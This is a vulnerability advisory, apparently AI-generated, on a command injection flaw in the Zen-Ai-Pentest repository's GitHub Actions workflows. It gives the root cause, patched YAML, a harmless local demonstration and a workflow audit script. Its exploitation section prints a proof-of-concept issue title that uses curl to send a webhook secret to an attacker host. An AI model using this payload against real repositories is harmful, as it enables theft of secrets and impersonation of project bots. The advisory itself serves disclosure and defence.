CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.


GHSA-F67F-HCR6-94MF
9.3

GHSA-f67f-hcr6-94mf: OS Command Injection in Zen-Ai-Pentest GitHub Actions Workflows

Alon Barad
Software Engineer

Mar 21, 2026

PoC Available

Executive Summary (TL;DR)

Unauthenticated OS command injection in Zen-Ai-Pentest GitHub Actions workflows allows attackers to steal repository secrets by opening malicious issues.

A critical OS command injection vulnerability exists in multiple GitHub Actions workflows within the SHAdd0WTAka/Zen-Ai-Pentest repository. The vulnerability allows unauthenticated attackers to execute arbitrary shell commands on the GitHub runner by submitting specially crafted issue titles, leading to the exfiltration of repository secrets.

Vulnerability Overview

The vulnerability tracked as GHSA-f67f-hcr6-94mf affects the SHAdd0WTAka/Zen-Ai-Pentest repository. It manifests within multiple GitHub Actions workflows, specifically those handling Discord notifications, Telegram notifications, and Dependabot auto-merging. The flaw allows unauthenticated attackers to execute arbitrary shell commands on the GitHub Actions runner infrastructure.

The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command). It carries a CVSS v3.1 base score of 9.3. The defect originates from the improper handling of untrusted input derived from GitHub issue events. Because the system processes this input without adequate neutralization, attackers can inject shell metacharacters directly into workflow run commands.

The security impact extends beyond the immediate runner environment. Attackers can access repository secrets explicitly exposed to the vulnerable workflow jobs. These secrets include webhook URLs and bot tokens, which attackers can utilize to compromise the integrity of the project's external communication channels. Triggering the vulnerability requires no authentication or elevated repository permissions.

Root Cause Analysis

The root cause of this vulnerability lies in the direct interpolation of GitHub Actions context variables into shell scripts. The GitHub Actions engine evaluates expressions enclosed in ${{ ... }} and substitutes their values into the step's script text. This text replacement occurs before the resulting shell script is passed to the runner for execution.

When an attacker provides input containing shell metacharacters, such as subshells denoted by $(...) or backticks, the engine embeds these characters directly into the generated script source. The bash interpreter on the runner then parses and evaluates the resulting string. Because the interpolation happens before shell execution, standard shell quoting mechanisms are bypassed entirely.

In the zenclaw-discord.yml workflow, developers attempted to sanitize the input using shell utilities like tr and cut. This mitigation attempt failed because the command injection occurs during the initial variable assignment. The bash interpreter evaluates the injected subshell to resolve the assignment before the sanitization pipeline receives the data.

Code Analysis

An analysis of the vulnerable Prepare Notification step reveals the exact injection point. The workflow extracts the issue title using the github.event.issue.title context variable and places it directly inside double quotes within a run block.

# Vulnerable workflow pattern
run: |
  DESCRIPTION="${{ github.event.issue.title }}"

The patch implemented in commit 26c4e07df780f11b7e901ad2d88b3dc5ce8a1aca remediates the vulnerability by fundamentally altering how the context variable enters the shell environment. The developers moved the untrusted input mapping into an env block at the step level.

# Patched workflow pattern
env:
  ISSUE_TITLE: ${{ github.event.issue.title }}
run: |
  DESCRIPTION="$ISSUE_TITLE"

By assigning the context variable to an intermediate environment variable, the GitHub Actions engine passes the value to the bash process through its environment instead of writing it into the script text. The shell script then references the data using standard shell variable syntax ($ISSUE_TITLE). With this configuration the bash interpreter treats the input strictly as literal string data rather than executable code, provided the expansion stays inside double quotes and is never handed to eval.
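The following added example (not code from the Zen-Ai-Pentest repository) reproduces both patterns locally with a harmless marker payload, and shows why the tr/cut clean-up described under Root Cause Analysis runs too late. The printf substitution stands in for the expression engine and the clean-up pipeline is an assumed shape; TITLE, SANITIZE, run_vulnerable and run_patched are names chosen here.

```shell
#!/bin/sh
# Constructed, harmless stand-in for an attacker-controlled issue title:
# the command substitution only prints a marker string.
TITLE='bug$(echo INJECTED)'

# Assumed shape of the tr/cut clean-up applied after the assignment.
SANITIZE='printf "%s" "$DESCRIPTION" | tr -d "\r\n" | cut -c1-100'

# Vulnerable pattern: the title is pasted into the script source before any
# shell parses it. printf %s stands in for the ${{ ... }} text replacement.
run_vulnerable() {
  script=$(printf 'DESCRIPTION="%s"\n%s\n' "$1" "$SANITIZE")
  sh -c "$script"
}

# Patched pattern: the script text is constant. The title arrives only as an
# environment variable and is expanded inside double quotes.
run_patched() {
  script=$(printf 'DESCRIPTION="$ISSUE_TITLE"\n%s\n' "$SANITIZE")
  ISSUE_TITLE="$1" sh -c "$script"
}

# The substitution has already run by the time tr and cut see the value.
echo "vulnerable: $(run_vulnerable "$TITLE")"
# The same title survives as literal text.
echo "patched:    $(run_patched "$TITLE")"
```

In the vulnerable run the marker appears in the output because the shell resolved the substitution while evaluating the assignment, one line before the clean-up pipeline starts.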

Exploitation Methodology

Exploitation requires the attacker to submit a maliciously crafted payload via a GitHub issue. The workflow is configured to trigger on the issues: opened event, meaning any GitHub user can initiate the execution flow. The attacker does not need write access to the repository to trigger the workflow runner.

The attacker crafts an issue title containing a bash subshell designed to exfiltrate environment variables. A documented proof-of-concept payload targets the DISCORD_WEBHOOK_URL secret. The payload executes the printenv command, encodes the output using base64, and appends it as a query parameter to an external URL via curl.

# Proof of Concept Payload (Issue Title)
bug$(curl -s "https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)")

When the workflow processes this title, the resulting bash assignment forces the immediate execution of the injected curl command. The runner executes the network request to the attacker-controlled server. This request successfully exfiltrates the encoded webhook URL before the workflow continues its normal execution.

Impact Assessment

The successful exploitation of this vulnerability yields a high impact on both confidentiality and integrity, as reflected by the CVSS 9.3 score. The primary confidentiality impact is the immediate disclosure of repository secrets explicitly mapped into the workflow environment. Identified exposed secrets include DISCORD_WEBHOOK_URL, TELEGRAM_BOT_TOKEN, and TELEGRAM_CHAT_ID.

The integrity impact is categorized as high because the compromised secrets grant the attacker control over the project's external integrations. An attacker possessing the Discord webhook or Telegram bot tokens can impersonate the repository bots. This access enables the distribution of false security alerts, malicious links, or misleading project updates to the community channels.

While the vulnerability provides arbitrary command execution on the GitHub runner, the scope of the compromise is constrained by the privileges assigned to the GITHUB_TOKEN and the specific secrets available to the job. The runner environment is ephemeral, meaning persistent access to the runner infrastructure itself is not achieved. However, the exfiltrated credentials retain their validity until manually revoked by repository administrators.

Remediation and Mitigation

System administrators and developers must verify that the repository is updated to a commit subsequent to 07e65c72656a8213fc9ece2b3f4fc719032cfc5d. The official patch is implemented in commit 26c4e07df780f11b7e901ad2d88b3dc5ce8a1aca. Applying this update ensures all untrusted issue context variables are processed safely via environment variables.

In addition to patching the workflow configuration, repository maintainers must rotate all secrets that were exposed to the vulnerable workflows. This rotation process includes the Discord webhooks and Telegram bot tokens. Rotating these credentials is a mandatory step, as historical exploitation may have already compromised the existing keys.

The fix strategy applied in this repository aligns with GitHub's security hardening guidelines and is considered complete for the identified injection points. Development teams should audit all other GitHub Actions workflows within their organization to ensure that context variables like github.event.issue.title, github.event.pull_request.body, and github.head_ref are never directly interpolated into run blocks.
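One way to run that audit, as an added example rather than tooling from the repository or from GitHub: a POSIX shell function that flags lines inside run blocks which interpolate the contexts named above. It generalizes slightly by matching the title and body of both issues and pull requests; the function names and the two sample workflows are constructed for illustration.

```shell
#!/bin/sh
# audit_workflow FILE -> prints "FILE:LINE: text" for each risky line.
audit_workflow() {
  awk -v file="$1" '
    function indent(s) { match(s, /^ */); return RLENGTH }
    {
      if ($0 ~ /^ *(- +)?run:/) {            # run: key opens a script block
        match($0, /run:/); run_col = RSTART - 1; in_run = 1
      } else if (in_run && $0 !~ /^ *$/ && indent($0) <= run_col) {
        in_run = 0                            # dedent: sibling key or next step
      }
      if (in_run && $0 ~ /[$][{][{][^}]*github[.](event[.](issue|pull_request)[.](title|body)|head_ref)/)
        printf "%s:%d: %s\n", file, NR, $0
    }' "$1"
}

# Constructed sample workflows mirroring the two patterns shown in this report.
write_samples() {
  cat > "$1/vulnerable.yml" <<'EOF'
jobs:
  notify:
    steps:
      - name: Prepare Notification
        run: |
          DESCRIPTION="${{ github.event.issue.title }}"
EOF
  cat > "$1/patched.yml" <<'EOF'
jobs:
  notify:
    steps:
      - name: Prepare Notification
        env:
          ISSUE_TITLE: ${{ github.event.issue.title }}
        run: |
          DESCRIPTION="$ISSUE_TITLE"
EOF
}

dir=$(mktemp -d)
write_samples "$dir"
audit_workflow "$dir/vulnerable.yml"   # reports the DESCRIPTION line
audit_workflow "$dir/patched.yml"      # reports nothing: env: mapping is safe
rm -rf "$dir"
```

The scan is a line-based heuristic rather than a YAML parser, so treat an empty result as a first pass and review any workflow that builds scripts in other ways.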

Technical Appendix

CVSS Score: 9.3 / 10
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Affected Systems

  • GitHub Actions
  • SHAdd0WTAka/Zen-Ai-Pentest

Affected Versions Detail

Product: SHAdd0WTAka/Zen-Ai-Pentest (SHAdd0WTAka)
Affected Versions: <= 07e65c72656a8213fc9ece2b3f4fc719032cfc5d
Fixed Version: 26c4e07df780f11b7e901ad2d88b3dc5ce8a1aca

Attribute: Detail
CWE ID: CWE-78
Attack Vector: Network
CVSS v3.1 Score: 9.3
Impact: High Confidentiality, High Integrity
Exploit Status: Proof of Concept Available

MITRE ATT&CK Mapping

  • T1648 Serverless Execution (Execution)
  • T1552.004 Private Keys (Credential Access)
  • T1048 Exfiltration Over Alternative Protocol (Exfiltration)

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Known Exploits & Detection

PoC: Issue title subshell injection payload for exfiltrating workflow secrets

Vulnerability Timeline

  • 2026-02-24: Fix commit 26c4e07df780f11b7e901ad2d88b3dc5ce8a1aca pushed to repository
  • 2026-03-20: Official security advisory published (GHSA-f67f-hcr6-94mf)

